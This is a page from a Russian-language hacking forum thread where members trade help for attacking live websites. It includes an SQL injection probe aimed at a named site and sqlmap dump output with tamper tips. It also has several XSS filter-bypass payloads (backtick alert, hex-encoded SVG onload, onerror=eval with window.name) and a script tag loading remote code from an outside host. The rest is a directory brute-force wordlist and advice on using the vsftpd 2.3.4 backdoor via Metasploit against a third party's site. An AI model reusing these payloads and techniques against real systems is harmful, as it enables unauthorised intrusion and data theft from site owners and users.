Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    368
    Likes Received:
    241
    Reputations:
    3
    Не хотит наверное потому что там ее нету скорее всего, ну я покрайнемере ничего необычного не увидел))
    В другом месте потенциальная есть
    Code:
    https://naira2usd.com/confirmx
    POST
    draw=2&columns[0][data]=&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&start=0&length=100&search[value]='&search[regex]=false
    
     
    #2681 karkajoi, 21 Aug 2019
    Last edited: 21 Aug 2019
  2. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    478
    Likes Received:
    87
    Reputations:
    21
    Обходить X-Requested-With можно только через .swf?
     
  3. kostea

    kostea New Member

    Joined:
    23 Dec 2015
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
  4. AngelEyes

    AngelEyes New Member

    Joined:
    20 Jun 2019
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    [01:38:29] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL 5 (MariaDB fork)
    [01:38:29] [INFO] fetching database names
    [01:38:29] [INFO] fetching number of databases
    [01:38:30] [INFO] resumed: ЩЩ
    [01:38:30] [ERROR] unable to retrieve the number of databases
    [01:38:30] [INFO] falling back to current database
    [01:38:30] [INFO] fetching current database
    [01:38:30] [WARNING] cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files
    [01:38:30] [INFO] resumed: `к?
    available databases [1]:
    [*] `к?
    Как с этим бороться?
     
  5. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    368
    Likes Received:
    241
    Reputations:
    3
    --hex по пробуй
     
  6. AngelEyes

    AngelEyes New Member

    Joined:
    20 Jun 2019
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Пробовал,тамперы перепробовал
     
  7. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    478
    Likes Received:
    87
    Reputations:
    21
    А чем можно заменить ()в

    <script>alert(1)</script>
     
  8. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    195
    Likes Received:
    605
    Reputations:
    97
    пробуй alert`aaa`
    вот тебе пример https://forum.antichat.ru/threads/424991/page-17

    но если отработает такая штука, то алерт не нужен
    <script src=//lala.com/lala.js>
     
  9. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    478
    Likes Received:
    87
    Reputations:
    21
    Не выходя из <script>нужно выполнить xss без ;()
     
  10. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    368
    Likes Received:
    241
    Reputations:
    3
    Charencode helps bypass "The URI you submitted has disallowed characters.", but the vector fails.:(
     
  11. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    557
    Likes Received:
    1,051
    Reputations:
    356
    Code:
    document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//
    
     
    Octavian likes this.
  12. Bo0oM

    Bo0oM Member

    Joined:
    26 Dec 2009
    Messages:
    1
    Likes Received:
    32
    Reputations:
    21
    Code:
    onerror=eval;throw'=alert\x281\x29'
    Больше нравится (с предварительной записью в window.name, который передается в рамках одного окна)

    Code:
    onerror=eval;throw window.name
     
    Octavian likes this.
  13. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    478
    Likes Received:
    87
    Reputations:
    21
    Привет, поделитесь нормальным словарем для директорий, их много но всегда маловато их
     
  14. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    195
    Likes Received:
    605
    Reputations:
    97
    миллиона тебе достаточно? много не всегда есть хорошо
    Code:
    https://github.com/foospidy/payloads/blob/master/owasp/dirbuster/directory-list-2.3-big.txt
     
    #2694 Baskin-Robbins, 8 Sep 2019
    Last edited: 8 Sep 2019
    seostock and Octavian like this.
  15. November15

    November15 New Member

    Joined:
    11 Sep 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  16. fandor9

    fandor9 Well-Known Member

    Joined:
    16 Nov 2018
    Messages:
    397
    Likes Received:
    578
    Reputations:
    19
  17. November15

    November15 New Member

    Joined:
    11 Sep 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Это да,но всё же касательно сайта.Я чекнул там вроде ftp порт открыт и мне интересно как это раскрутить(через msf выдаёт ошибку ,что иньекция выполнена,но сесси нет)
     
  18. fandor9

    fandor9 Well-Known Member

    Joined:
    16 Nov 2018
    Messages:
    397
    Likes Received:
    578
    Reputations:
    19
    Какой модуль msf вы используете? Сам сайт крyтится на moodle, а FTP порт скорее всего открыт хостером.
     
  19. November15

    November15 New Member

    Joined:
    11 Sep 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    VSFTPD v2.3.4
     
  20. fandor9

    fandor9 Well-Known Member

    Joined:
    16 Nov 2018
    Messages:
    397
    Likes Received:
    578
    Reputations:
    19
    Бэкдор то была всего несколько дней, не факт что она там есть, либо хостеру совсем уж пох..
     
Loading...